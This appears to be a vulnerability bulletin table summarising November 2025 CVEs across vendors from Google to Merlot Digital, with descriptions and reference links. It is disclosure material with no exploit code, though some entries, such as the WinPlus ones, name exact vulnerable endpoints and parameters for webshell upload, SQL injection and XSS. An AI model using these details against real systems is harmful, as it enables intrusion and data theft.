| Google Cloud--Looker | An attacker with a Looker Developer role could manipulate a LookML project to exploit a race condition during Git directory deletion, leading to arbitrary command execution on the Looker instance. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.103+ * 24.18.195+ * 25.0.72+ * 25.6.60+ * 25.8.42+ * 25.10.22+ | 2025-11-19 | not yet calculated | CVE-2025-12472 | https://cloud.google.com/support/bulletins#gcp-2025-052   |
| Google Cloud--Looker | The Looker endpoint for generating new projects from database connections allows users to specify "looker" as a connection name, which is a reserved internal name for Looker's internal MySQL database. The schemas parameter is vulnerable to SQL injection, enabling attackers to manipulate SELECT queries that are constructed and executed against the internal MySQL database. This vulnerability allows users with developer permissions to extract data from Looker's internal MySQL database. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect against this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.106 * 24.18.198+ * 25.0.75 * 25.6.63+ * 25.8.45+ * 25.10.33+ * 25.12.1+ * 25.14+ | 2025-11-19 | not yet calculated | CVE-2025-12743 | https://cloud.google.com/support/bulletins#gcp-2025-052 https://www.tenable.com/security/research/tra-2025-43   |
| Google--Android | In bta_hf_client_cb_init of bta_hf_client_main.cc, there is a possible remote code execution due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-11-18 | not yet calculated | CVE-2025-48593 | https://android.googlesource.com/platform/packages/modules/Bluetooth/+/c69c78d7c4f623201f35831d32e6c401156e76cc https://android.googlesource.com/platform/packages/modules/Bluetooth/+/5ed63461b44198c80d5aff7e1af1df812f782abb https://source.android.com/security/bulletin/2025-11-01   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.175 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13223 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.175 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13224 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13226 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13227 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13228 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13229 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13230 |   |
| Google--OSV-SCALIBR | A bug in the filesystem traversal fallback path causes fs/diriterate/diriterate.go:Next() to overindex an empty slice when ReadDir returns nil for an empty directory, resulting in a panic (index out of range) and an application crash (denial of service) in OSV-SCALIBR. | 2025-11-20 | not yet calculated | CVE-2025-13425 | https://github.com/google/osv-scalibr/commit/e67c4e198ca099cb7c16957a80f6c5331d90a672   |
| Google--zx | When zx is invoked with --prefer-local=<path>, the CLI creates a symlink named ./node_modules pointing to <path>/node_modules. Due to a logic error in src/cli.ts (linkNodeModules / cleanup), the function returns the target path instead of the alias (symlink path). The later cleanup routine removes what it received, which deletes the target directory itself. Result: zx can delete an external <path>/node_modules outside the current working directory. | 2025-11-20 | not yet calculated | CVE-2025-13437 | https://github.com/google/zx/issues/1348   |
| hupe13--Extensions for Leaflet Map | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hupe13 Extensions for Leaflet Map extensions-leaflet-map allows DOM-Based XSS. This issue affects Extensions for Leaflet Map: from n/a through <= 4.8. | 2025-11-21 | not yet calculated | CVE-2025-66093 | https://vdp.patchstack.com/database/Wordpress/Plugin/extensions-leaflet-map/vulnerability/wordpress-extensions-for-leaflet-map-plugin-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Icegram--Email Subscribers & Newsletters | Deserialization of Untrusted Data vulnerability in Icegram Email Subscribers & Newsletters email-subscribers allows Object Injection. This issue affects Email Subscribers & Newsletters: from n/a through <= 5.9.10. | 2025-11-21 | not yet calculated | CVE-2025-66055 | https://vdp.patchstack.com/database/Wordpress/Plugin/email-subscribers/vulnerability/wordpress-email-subscribers-newsletters-plugin-5-9-10-php-object-injection-vulnerability?_s_id=cve   |
| Igor Jerosimić--I Order Terms | Cross-Site Request Forgery (CSRF) vulnerability in Igor Jerosimić I Order Terms i-order-terms allows Cross Site Request Forgery. This issue affects I Order Terms: from n/a through <= 1.5.0. | 2025-11-21 | not yet calculated | CVE-2025-66097 | https://vdp.patchstack.com/database/Wordpress/Plugin/i-order-terms/vulnerability/wordpress-i-order-terms-plugin-1-5-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |
| ilbers--isar | Isar is an integration system for automated root filesystem generation. In versions 0.11-rc1 and 0.11, defining ISAR_APT_SNAPSHOT_DATE alone does not set the correct timestamp value for security distribution, leading to missed security updates. This issue has been patched via commit 738bcbb. | 2025-11-19 | not yet calculated | CVE-2025-65100 | https://github.com/ilbers/isar/security/advisories/GHSA-3r9w-6cp6-7hm4 https://github.com/ilbers/isar/commit/3383fd808a4ced93e41e012660dfe364a3384434 https://github.com/ilbers/isar/commit/738bcbb716c7eb7b34cbb2293cae4f264b3925fe   |
| Imagination Technologies--Graphics DDK | Kernel or driver software installed on a Guest VM may post improper commands to the GPU Firmware to exploit a TOCTOU race condition and trigger a read and/or write of data outside the allotted memory escaping the virtual machine. | 2025-11-17 | not yet calculated | CVE-2025-58407 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/   |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to gain write permissions to memory buffers exported as read-only. This is caused by improper handling of the memory protections for the buffer resource. | 2025-11-17 | not yet calculated | CVE-2025-58410 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/   |
| Imtiaz Rayhan--Table Block by Tableberg | Missing Authorization vulnerability in Imtiaz Rayhan Table Block by Tableberg tableberg allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Table Block by Tableberg: from n/a through <= 0.6.9. | 2025-11-21 | not yet calculated | CVE-2025-66096 | https://vdp.patchstack.com/database/Wordpress/Plugin/tableberg/vulnerability/wordpress-table-block-by-tableberg-plugin-0-6-9-broken-access-control-vulnerability?_s_id=cve   |
| Informática del Este--WinPlus | Faulty authorization control in the WinPlus v24.11.27 software by Informática del Este allows another user to be impersonated simply by knowing their 'numerical ID', meaning that an attacker could compromise another user's account, thereby affecting the confidentiality, integrity, and availability of the data stored in the application. | 2025-11-18 | not yet calculated | CVE-2025-41346 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informática del Este--WinPlus | Unrestricted upload vulnerability for dangerous file types in WinPlus v24.11.27 by Informática del Este. This vulnerability allows an attacker to upload a 'webshell' by sending a POST request to '/WinplusPortal/ws/sWinplus.svc/json/uploadfile'. | 2025-11-18 | not yet calculated | CVE-2025-41347 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informática del Este--WinPlus | SQL injection vulnerability in WinPlus v24.11.27 by Informática del Este. This vulnerability allows an attacker to retrieve, create, update and delete databases by sending a POST request using the parameters 'val1' and 'cont' in '/WinplusPortal/ws/sWinplus.svc/json/getacumper_post'. | 2025-11-18 | not yet calculated | CVE-2025-41348 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informática del Este--WinPlus | Stored Cross-site Scripting (XSS) vulnerability in WinPlus v24.11.27 by Informática del Este, caused by a lack of proper validation of user input submitted in a POST request using the 'descripcion' parameter in '/WinplusPortal/ws/sWinplus.svc/json/savesolpla_post'. This vulnerability could allow a remote user to send a specially crafted query to an authenticated user and steal their session cookie details. | 2025-11-18 | not yet calculated | CVE-2025-41349 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informática del Este--WinPlus | Stored Cross-site Scripting (XSS) vulnerability in WinPlus v24.11.27 by Informática del Este, caused by a lack of proper validation of user input submitted in a POST request using the 'descripcion' parameter in '/WinplusPortal/ws/sWinplus.svc/json/savesoldoc_post'. This vulnerability could allow a remote user to send a specially crafted query to an authenticated user and steal their session cookie details. | 2025-11-18 | not yet calculated | CVE-2025-41350 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Iqonic Design--KiviCare | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows SQL Injection. This issue affects KiviCare: from n/a through <= 3.6.13. | 2025-11-21 | not yet calculated | CVE-2025-66095 | https://vdp.patchstack.com/database/Wordpress/Plugin/kivicare-clinic-management-system/vulnerability/wordpress-kivicare-plugin-3-6-13-sql-injection-vulnerability?_s_id=cve   |
| JCD--Windu CMS | Windu CMS is vulnerable to Cross-Site Request Forgery in user editing functionality. The implemented CSRF protection mechanism can be bypassed by using the CSRF token of another user. It is worth noting that registration is open and anyone can create an account. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59110 | https://windu.org/ https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Broken Access Control in user editing functionality. A malicious attacker can send a GET request that allows privileged users to delete Super Admins, which is not possible through the GUI. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59111 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Cross-Site Request Forgery in user editing functionality. A malicious attacker can craft a special website which, when visited by the victim, will automatically send a POST request that deletes a given user. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59112 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS implements weak client-side brute-force protection using the loginError parameter. Information about the attempt count or timeout is not stored on the server, which allows a malicious attacker to bypass this brute-force protection by resetting this parameter. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59113 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Cross-Site Request Forgery in file uploading functionality. A malicious attacker can craft a special website which, when visited by the victim, will automatically send a malicious file to the server. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59114 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Stored Cross-Site Scripting (XSS) in the logon page, where input data has no proper validation. A malicious attacker can inject arbitrary HTML and JS into the website, which will be rendered/executed when an admin visits the logs page. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59115 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to User Enumeration. This issue occurs during logon, where a difference in messages could allow an attacker to determine if the login is valid or not, enabling a brute force attack with valid logins. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59116 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to multiple Stored Cross-Site Scripting (XSS) vulnerabilities in the page editing endpoint windu/admin/content/pages/edit/. This vulnerability can be exploited by a privileged user and may target users with higher privileges. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59117 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| Jeff Starr--Head Meta Data | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeff Starr Head Meta Data head-meta-data allows Stored XSS. This issue affects Head Meta Data: from n/a through <= 20250327. | 2025-11-21 | not yet calculated | CVE-2025-66081 | https://vdp.patchstack.com/database/Wordpress/Plugin/head-meta-data/vulnerability/wordpress-head-meta-data-plugin-20250327-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Jegstudio--Gutenverse | Missing Authorization vulnerability in Jegstudio Gutenverse gutenverse allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gutenverse: from n/a through <= 3.2.1. | 2025-11-21 | not yet calculated | CVE-2025-66065 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse/vulnerability/wordpress-gutenverse-plugin-3-2-1-broken-access-control-vulnerability?_s_id=cve   |
| Jegstudio--Gutenverse Form | Missing Authorization vulnerability in Jegstudio Gutenverse Form gutenverse-form allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gutenverse Form: from n/a through <= 2.2.0. | 2025-11-21 | not yet calculated | CVE-2025-66079 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse-form/vulnerability/wordpress-gutenverse-form-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve   |
| jgwhite33--WP Google Review Slider | Missing Authorization vulnerability in jgwhite33 WP Google Review Slider wp-google-places-review-slider allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Google Review Slider: from n/a through <= 17.4. | 2025-11-21 | not yet calculated | CVE-2025-66063 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-google-places-review-slider/vulnerability/wordpress-wp-google-review-slider-plugin-17-4-broken-access-control-vulnerability?_s_id=cve   |
| jzeuzs--thread-amount | thread-amount is a tool that gets the number of threads in the current process. Prior to version 0.2.2, there are resource leaks when querying thread counts on Windows and Apple platforms. On Windows platforms, the thread_amount function calls CreateToolhelp32Snapshot but fails to close the returned HANDLE using CloseHandle. Repeated calls to this function will cause the handle count of the process to grow indefinitely, eventually leading to system instability or process termination when the handle limit is reached. On Apple platforms, the thread_amount function calls task_threads (via Mach kernel APIs), which allocates memory for the thread list. The function fails to deallocate this memory using vm_deallocate. Repeated calls will result in a steady memory leak, eventually causing the process to be killed by the OOM (Out of Memory) killer. This issue has been patched in version 0.2.2. | 2025-11-21 | not yet calculated | CVE-2025-65947 | https://github.com/jzeuzs/thread-amount/security/advisories/GHSA-jf9p-2fv9-2jp2 https://github.com/jzeuzs/thread-amount/pull/29 https://github.com/jzeuzs/thread-amount/commit/28860d4a38286609cb884c13b5b7941edc2390e5   |
| KDDI CORPORATION--'デジラアプリ' App for iOS | Improper certificate validation vulnerability exists in 'デジラアプリ' App for iOS prior to ver.80.10.00. If this vulnerability is exploited, a man-in-the-middle attack may allow an attacker to eavesdrop on and/or tamper with an encrypted communication. | 2025-11-17 | not yet calculated | CVE-2025-60022 | https://jvn.jp/en/jp/JVN54005037/   |
| Kriesi--Enfold | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold enfold allows Stored XSS. This issue affects Enfold: from n/a through <= 7.1.2. | 2025-11-21 | not yet calculated | CVE-2025-66053 | https://vdp.patchstack.com/database/Wordpress/Theme/enfold/vulnerability/wordpress-enfold-theme-7-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| kubevirt--kubevirt | KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to versions 1.6.1 and 1.7.0, the implementation of this feature, and more specifically the `DiskOrCreate` option (which creates a file if it doesn't exist), has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue. | 2025-11-18 | not yet calculated | CVE-2025-64324 | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh https://github.com/kubevirt/kubevirt/pull/15037 https://github.com/kubevirt/kubevirt/commit/00d03e43e3bf03e563136695a4732b65ed42d764 https://github.com/kubevirt/kubevirt/commit/ff3b69b08b6b9c8d08d23735ca8d82455f790a69   |
| langchain-ai--langchain | LangChain is a framework for building agents and LLM-powered applications. In versions 0.3.79 and prior, and 1.0.0 to 1.0.6, a template injection vulnerability exists in LangChain's prompt template system that allows attackers to access Python object internals through template syntax. This vulnerability affects applications that accept untrusted template strings (not just template variables) in ChatPromptTemplate and related prompt template classes. This issue has been patched in versions 0.3.80 and 1.0.7. | 2025-11-21 | not yet calculated | CVE-2025-65106 | https://github.com/langchain-ai/langchain/security/advisories/GHSA-6qv9-48xg-fc7f https://github.com/langchain-ai/langchain/commit/c4b6ba254e1a49ed91f2e268e6484011c540542a https://github.com/langchain-ai/langchain/commit/fa7789d6c21222b85211755d822ef698d3b34e00   |
| LimeSurvey--LimeSurvey | Vulnerability in LimeSurvey 6.13.0 in the endpoint /optout that causes infinite HTTP redirects when accessed directly. This behavior can be exploited to generate a Denial of Service (DoS) attack by exhausting server or client resources. The system is unable to break the redirect loop, which can cause service degradation or browser instability. | 2025-11-20 | not yet calculated | CVE-2025-41074 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-limesurvey-0   |
| LimeSurvey--LimeSurvey | Vulnerability in LimeSurvey 6.13.0 in the endpoint /optin that causes infinite HTTP redirects when accessed directly. This behavior can be exploited to generate a Denial of Service (DoS) attack by exhausting server or client resources. The system is unable to break the redirect loop, which can cause service degradation or browser instability. | 2025-11-20 | not yet calculated | CVE-2025-41075 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-limesurvey-0   |
| LimeSurvey--LimeSurvey | In version 6.13.0 of LimeSurvey, any external user can cause a 500 error in the survey system by sending a malformed session cookie. Instead of displaying a generic error message, the system exposes internal backend information, including the use of the Yii framework, the MySQL/MariaDB database engine, the table name 'lime_sessions', primary keys, and fragments of the content that caused the conflict. This information can simplify the collection of data about the internal architecture of the application by an attacker. | 2025-11-20 | not yet calculated | CVE-2025-41076 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-limesurvey-0   |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix memory leak of qgroup_list in btrfs_add_qgroup_relation When btrfs_add_qgroup_relation() is called with invalid qgroup levels (src >= dst), the function returns -EINVAL directly without freeing the preallocated qgroup_list structure passed by the caller. This causes a memory leak because the caller unconditionally sets the pointer to NULL after the call, preventing any cleanup. The issue occurs because the level validation check happens before the mutex is acquired and before any error handling path that would free the prealloc pointer. On this early return, the cleanup code at the 'out' label (which includes kfree(prealloc)) is never reached. In btrfs_ioctl_qgroup_assign(), the code pattern is: prealloc = kzalloc(sizeof(*prealloc), GFP_KERNEL); ret = btrfs_add_qgroup_relation(trans, sa->src, sa->dst, prealloc); prealloc = NULL; // Always set to NULL regardless of return value ... kfree(prealloc); // This becomes kfree(NULL), does nothing When the level check fails, 'prealloc' is never freed by either the callee or the caller, resulting in a 64-byte memory leak per failed operation. This can be triggered repeatedly by an unprivileged user with access to a writable btrfs mount, potentially exhausting kernel memory. Fix this by freeing prealloc before the early return, ensuring prealloc is always freed on all error paths. | 2025-11-21 | not yet calculated | CVE-2025-40209 | https://git.kernel.org/stable/c/3412d0e973e8f8381747d69033eda809a57a2581 https://git.kernel.org/stable/c/a4d9ebe23bcb79d9d057e3c995db73b7b3aae414 https://git.kernel.org/stable/c/f260c6aff0b8af236084012d14f9f1bf792ea883   |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "NFSD: Remove the cap on number of operations per NFSv4 COMPOUND" I've found that pynfs COMP6 now leaves the connection or lease in a strange state, which causes CLOSE9 to hang indefinitely. I've dug into it a little, but I haven't been able to root-cause it yet. However, I bisected to commit 48aab1606fa8 ("NFSD: Remove the cap on number of operations per NFSv4 COMPOUND"). Tianshuo Han also reports a potential vulnerability when decoding an NFSv4 COMPOUND. An attacker can place an arbitrarily large op count in the COMPOUND header, which results in: [ 51.410584] nfsd: vmalloc error: size 1209533382144, exceeds total pages, mode:0xdc0(GFP_KERNEL|__GFP_ZERO), nodemask=(null),cpuset=/,mems_allowed=0 when NFSD attempts to allocate the COMPOUND op array. Let's restore the operation-per-COMPOUND limit, but increased to 200 for now. | 2025-11-21 | not yet calculated | CVE-2025-40210 | https://git.kernel.org/stable/c/b3ee7ce432289deac87b9d14e01f2fe6958f7f0b https://git.kernel.org/stable/c/3e7f011c255582d7c914133785bbba1990441713   |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: video: Fix use-after-free in acpi_video_switch_brightness() The switch_brightness_work delayed work accesses device->brightness and device->backlight, freed by acpi_video_dev_unregister_backlight() during device removal. If the work executes after acpi_video_bus_unregister_backlight() frees these resources, it causes a use-after-free when acpi_video_switch_brightness() dereferences device->brightness or device->backlight. Fix this by calling cancel_delayed_work_sync() for each device's switch_brightness_work in acpi_video_bus_remove_notify_handler() after removing the notify handler that queues the work. This ensures the work completes before the memory is freed. [ rjw: Changelog edit ] | 2025-11-21 | not yet calculated | CVE-2025-40211 | https://git.kernel.org/stable/c/4e85246ec0d019dfba86ba54d841ef6694f97149 https://git.kernel.org/stable/c/de5fc93275a4a459fe2f7cb746984f2ab3e8292a https://git.kernel.org/stable/c/293125536ef5521328815fa7c76d5f9eb1635659 https://git.kernel.org/stable/c/8f067aa59430266386b83c18b983ca583faa6a11   |
| Lite XL--Lite XL | Lite XL versions 2.1.8 and prior automatically execute the .lite_project.lua file when opening a project directory, without prompting the user for confirmation. The .lite_project.lua file is intended for project-specific configuration but can contain executable Lua logic. This behavior could allow execution of untrusted Lua code if a user opens a malicious project, potentially leading to arbitrary code execution with the privileges of the Lite XL process. | 2025-11-20 | not yet calculated | CVE-2025-12120 | https://github.com/lite-xl/lite-xl/pull/2164 https://kb.cert.org/vuls/id/579478   |
| Lite XL--Lite XL | Lite XL versions 2.1.8 and prior contain a vulnerability in the system.exec function, which allowed arbitrary command execution through unsanitized shell command construction. This function was used in project directory launching (core.lua), drag-and-drop file handling (rootview.lua), and the "open in system" command in the treeview plugin (treeview.lua). If an attacker could influence input to system.exec, they might execute arbitrary commands with the privileges of the Lite XL process. | 2025-11-20 | not yet calculated | CVE-2025-12121 | https://github.com/lite-xl/lite-xl/pull/2163 https://kb.cert.org/vuls/id/579478   |
| LogStare Inc.--Installer of LogStare Collector (for Windows) | Uncontrolled search path element issue exists in the installer of LogStare Collector (for Windows). If exploited, arbitrary code may be executed with the privilege of the user invoking the installer. | 2025-11-21 | not yet calculated | CVE-2025-64695 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | The installation directory of LogStare Collector is configured with incorrect access permissions. A non-administrative user may manipulate files within the installation directory and execute arbitrary code with the administrative privilege. | 2025-11-21 | not yet calculated | CVE-2025-58097 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | LogStare Collector contains a stored cross-site scripting vulnerability in UserManagement. If crafted user information is stored, an arbitrary script may be executed on the web browser of the user who logs in to the product's management page. | 2025-11-21 | not yet calculated | CVE-2025-61949 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | LogStare Collector contains an incorrect authorization vulnerability in UserRegistration. If exploited, a non-administrative user may create a new user account by sending a crafted HTTP request. | 2025-11-21 | not yet calculated | CVE-2025-62189 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | Cross-site request forgery vulnerability exists in LogStare Collector. If a user views a crafted page while logged in, unintended operations may be performed. | 2025-11-21 | not yet calculated | CVE-2025-62687 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | LogStare Collector improperly handles the password hash data. An administrative user may obtain the other users' password hashes. | 2025-11-21 | not yet calculated | CVE-2025-64299 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to version 1.35.1, there is potential cross-site scripting on the index and tree pages. This issue has been patched in version 1.35.1. | 2025-11-19 | not yet calculated | CVE-2025-65095 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-m9g6-23c8-vrxf https://github.com/Lookyloo/lookyloo/commit/ac2f73dbfcad88b815b18c42cca77a1c645f1726 https://github.com/Lookyloo/lookyloo/blob/main/website/web/default_csp.py https://vulnerability.circl.lu/vuln/gcve-1-2025-0018   |
| Lynxtechnology--Twonky Server | Twonky Server 8.5.2 on Linux and Windows is vulnerable to an access control flaw. An unauthenticated attacker can bypass web service API authentication controls to leak a log file and read the administrator's username and encrypted password. | 2025-11-19 | not yet calculated | CVE-2025-13315 | https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/   |
| Lynxtechnology--Twonky Server | Twonky Server 8.5.2 on Linux and Windows is vulnerable to a cryptographic flaw, use of hard-coded cryptographic keys. An attacker with knowledge of the encrypted administrator password can decrypt the value with static keys to view the plain text password and gain administrator-level access to Twonky Server. | 2025-11-19 | not yet calculated | CVE-2025-13316 | https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/   |
| M-Files Corporation--M-Files Server | Denial-of-service condition in M-Files Server versions before 25.11.15392.1, before 25.2 LTS SR2 and before 25.8 LTS SR2 allows an authenticated user to cause the MFserver process to crash. | 2025-11-17 | not yet calculated | CVE-2025-11681 | https://product.m-files.com/security-advisories/cve-2025-11681/   |
| magepeopleteam--WpEvently | Missing Authorization vulnerability in magepeopleteam WpEvently mage-eventpress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpEvently: from n/a through <= 5.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66082 | https://vdp.patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-0-4-broken-access-control-vulnerability?_s_id=cve   |
| magepeopleteam--WpEvently | Missing Authorization vulnerability in magepeopleteam WpEvently mage-eventpress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpEvently: from n/a through <= 5.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66083 | https://vdp.patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-0-4-broken-access-control-vulnerability-2?_s_id=cve   |
| MatrixAddons--Easy Invoice | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in MatrixAddons Easy Invoice easy-invoice allows PHP Local File Inclusion. This issue affects Easy Invoice: from n/a through <= 2.1.4. | 2025-11-21 | not yet calculated | CVE-2025-66115 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-invoice/vulnerability/wordpress-easy-invoice-plugin-2-1-4-local-file-inclusion-vulnerability?_s_id=cve   |
| Merlot Digital (by TNC)--TNC Toolbox: Web Performance | Missing Authorization vulnerability in Merlot Digital (by TNC) TNC Toolbox: Web Performance tnc-toolbox allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TNC Toolbox: Web Performance: from n/a through <= 2.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66108 | https://vdp.patchstack.com/database/Wordpress/Plugin/tnc-toolbox/vulnerability/wordpress-tnc-toolbox-web-performance-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve   |
